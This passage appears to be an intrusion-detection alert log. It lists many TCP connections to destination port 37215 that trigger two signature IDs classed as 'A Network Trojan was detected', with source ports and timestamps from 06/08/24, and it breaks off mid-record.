          SID:2835222
          Source Port:45946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912402
          SID:2835222
          Source Port:44052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514847
          SID:2829579
          Source Port:52912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444100
          SID:2829579
          Source Port:59114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038019
          SID:2835222
          Source Port:47280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741342
          SID:2829579
          Source Port:56930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884463
          SID:2829579
          Source Port:45578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896121
          SID:2829579
          Source Port:33252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745233
          SID:2835222
          Source Port:47640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792851
          SID:2835222
          Source Port:53578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466218
          SID:2829579
          Source Port:54698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.815542
          SID:2835222
          Source Port:36752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.056353
          SID:2835222
          Source Port:46076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895599
          SID:2835222
          Source Port:33202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355106
          SID:2829579
          Source Port:58726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.170730
          SID:2835222
          Source Port:48610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161285
          SID:2835222
          Source Port:47946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730034
          SID:2829579
          Source Port:41482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465977
          SID:2835222
          Source Port:59534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783777
          SID:2829579
          Source Port:48556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151338
          SID:2829579
          Source Port:51890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799347
          SID:2829579
          Source Port:55686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746946
          SID:2829579
          Source Port:49034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351370
          SID:2829579
          Source Port:56706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175572
          SID:2835222
          Source Port:33572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157525
          SID:2835222
          Source Port:55096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099179
          SID:2835222
          Source Port:39790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259070
          SID:2835222
          Source Port:40312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.447029
          SID:2829579
          Source Port:33950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599329
          SID:2835222
          Source Port:34384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911612
          SID:2835222
          Source Port:32812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135983
          SID:2829579
          Source Port:58350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239374
          SID:2835222
          Source Port:60048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407832
          SID:2835222
          Source Port:59398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788326
          SID:2829579
          Source Port:35484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191885
          SID:2835222
          Source Port:38830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.824345
          SID:2829579
          Source Port:42438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509429
          SID:2829579
          Source Port:34350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857528
          SID:2829579
          Source Port:56862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.606578
          SID:2829579
          Source Port:33974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233578
          SID:2829579
          Source Port:55238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549820
          SID:2835222
          Source Port:58518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352165
          SID:2835222
          Source Port:43922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745584
          SID:2835222
          Source Port:41658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783420
          SID:2835222
          Source Port:42764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739560
          SID:2829579
          Source Port:36974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.516448
          SID:2835222
          Source Port:50446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781558
          SID:2829579
          Source Port:54168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264070
          SID:2829579
          Source Port:55866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788585
          SID:2835222
          Source Port:39646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462101
          SID:2829579
          Source Port:36824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108726
          SID:2835222
          Source Port:60380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738041
          SID:2829579
          Source Port:34154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810410
          SID:2829579
          Source Port:57448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016475
          SID:2835222
          Source Port:59706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.843598
          SID:2829579
          Source Port:35390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005685
          SID:2829579
          Source Port:60222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.057950
          SID:2829579
          Source Port:57200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155495
          SID:2835222
          Source Port:54698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160564
          SID:2835222
          Source Port:48644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897445
          SID:2835222
          Source Port:38454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.822977
          SID:2829579
          Source Port:38146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897018
          SID:2829579
          Source Port:49864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793224
          SID:2829579
          Source Port:38900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819262
          SID:2835222
          Source Port:44460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732073
          SID:2829579
          Source Port:55242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731321
          SID:2829579
          Source Port:32896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550733
          SID:2829579
          Source Port:56526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113298
          SID:2829579
          Source Port:46682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449753
          SID:2835222
          Source Port:43960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113875
          SID:2835222
          Source Port:34172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.516253
          SID:2835222
          Source Port:46300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599354
          SID:2829579
          Source Port:38106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784472
          SID:2835222
          Source Port:60330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266081
          SID:2829579
          Source Port:36416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.893982
          SID:2835222
          Source Port:35604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781121
          SID:2835222
          Source Port:59992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740609
          SID:2829579
          Source Port:56486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.057974
          SID:2829579
          Source Port:37854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466230
          SID:2835222
          Source Port:51122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601910
          SID:2829579
          Source Port:49684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242236
          SID:2835222
          Source Port:54666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510613
          SID:2835222
          Source Port:45146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516968
          SID:2835222
          Source Port:37108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466073
          SID:2835222
          Source Port:44710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067657
          SID:2829579
          Source Port:43672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781118
          SID:2835222
          Source Port:58242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258687
          SID:2829579
          Source Port:47834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855392
          SID:2835222
          Source Port:36332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705004
          SID:2835222
          Source Port:36286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131209
          SID:2835222
          Source Port:59764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269552
          SID:2829579
          Source Port:52988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396340
          SID:2835222
          Source Port:53790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730308
          SID:2835222
          Source Port:37974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403214
          SID:2829579
          Source Port:37690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857391
          SID:2829579
          Source Port:55130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262604
          SID:2829579
          Source Port:55828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.159161
          SID:2835222
          Source Port:54486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601536
          SID:2835222
          Source Port:33568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273097
          SID:2835222
          Source Port:48644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888539
          SID:2835222
          Source Port:51938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456540
          SID:2829579
          Source Port:41056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732279
          SID:2829579
          Source Port:34718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271605
          SID:2829579
          Source Port:45560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668021
          SID:2835222
          Source Port:52924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.162566
          SID:2835222
          Source Port:45334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351281
          SID:2829579
          Source Port:51578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017870
          SID:2835222
          Source Port:58528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.517957
          SID:2829579
          Source Port:47440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160776
          SID:2835222
          Source Port:34090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109363
          SID:2835222
          Source Port:56578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160644
          SID:2835222
          Source Port:47716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396852
          SID:2829579
          Source Port:54210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786756
          SID:2829579
          Source Port:54984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355044
          SID:2835222
          Source Port:43950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174978
          SID:2829579
          Source Port:43382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896103
          SID:2835222
          Source Port:59784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734896
          SID:2835222
          Source Port:53042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174055
          SID:2829579
          Source Port:37470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238386
          SID:2829579
          Source Port:56044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238196
          SID:2829579
          Source Port:39192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461547
          SID:2829579
          Source Port:49390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177916
          SID:2829579
          Source Port:33880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742041
          SID:2829579
          Source Port:40362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.815512
          SID:2835222
          Source Port:60142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858158
          SID:2829579
          Source Port:37318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353324
          SID:2829579
          Source Port:48272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.066376
          SID:2829579
          Source Port:39344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738828
          SID:2829579
          Source Port:44700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551628
          SID:2835222
          Source Port:38882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599555
          SID:2829579
          Source Port:47356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266302
          SID:2829579
          Source Port:34748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461708
          SID:2835222
          Source Port:46214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781790
          SID:2829579
          Source Port:38364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742023
          SID:2829579
          Source Port:48440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.189219
          SID:2835222
          Source Port:50610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732473
          SID:2829579
          Source Port:35136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.881264
          SID:2835222
          Source Port:46158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901825
          SID:2835222
          Source Port:38742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742093
          SID:2829579
          Source Port:53584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113816
          SID:2835222
          Source Port:41772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446145
          SID:2829579
          Source Port:58970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.841664
          SID:2829579
          Source Port:46090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005699
          SID:2829579
          Source Port:44274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176347
          SID:2835222
          Source Port:42460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.508965
          SID:2835222
          Source Port:38660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705346
          SID:2835222
          Source Port:38152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270314
          SID:2835222
          Source Port:56002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704543
          SID:2835222
          Source Port:44088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.464075
          SID:2835222
          Source Port:51626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513771
          SID:2829579
          Source Port:43640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161321
          SID:2835222
          Source Port:47410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038161
          SID:2835222
          Source Port:53282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352232
          SID:2835222
          Source Port:33532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855465
          SID:2835222
          Source Port:35808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264654
          SID:2835222
          Source Port:50380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.088090
          SID:2835222
          Source Port:39320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113529
          SID:2829579
          Source Port:41496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734347
          SID:2829579
          Source Port:35616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784098
          SID:2829579
          Source Port:37180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795780
          SID:2835222
          Source Port:33348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.465819
          SID:2829579
          Source Port:38518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516476
          SID:2829579
          Source Port:50078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.805475
          SID:2835222
          Source Port:56776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733213
          SID:2829579
          Source Port:35474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670069
          SID:2835222
          Source Port:46324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131965
          SID:2835222
          Source Port:58742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015838
          SID:2829579
          Source Port:40396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112096
          SID:2835222
          Source Port:50970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517531
          SID:2835222
          Source Port:43654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745832
          SID:2835222
          Source Port:40224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892546
          SID:2829579
          Source Port:42822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800468
          SID:2835222
          Source Port:51024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791617
          SID:2829579
          Source Port:51368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236870
          SID:2835222
          Source Port:42002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780896
          SID:2835222
          Source Port:41358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107875
          SID:2835222
          Source Port:48848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.511643
          SID:2829579
          Source Port:48432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160179
          SID:2829579
          Source Port:53880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789084
          SID:2829579
          Source Port:49092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.801019
          SID:2835222
          Source Port:38212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465380
          SID:2829579
          Source Port:37466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742572
          SID:2829579
          Source Port:48536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018853
          SID:2835222
          Source Port:55884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108547
          SID:2829579
          Source Port:40110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810986
          SID:2829579
          Source Port:45738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404567
          SID:2835222
          Source Port:48608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671620
          SID:2829579
          Source Port:55224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275471
          SID:2829579
          Source Port:44752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161457
          SID:2835222
          Source Port:37160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742790
          SID:2829579
          Source Port:59372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158922
          SID:2835222
          Source Port:58896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233619
          SID:2835222
          Source Port:51686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237030
          SID:2835222
          Source Port:51690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548828
          SID:2835222
          Source Port:60274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817502
          SID:2829579
          Source Port:56454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460139
          SID:2835222
          Source Port:50768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.025917
          SID:2835222
          Source Port:43542
          Destination Port:37215
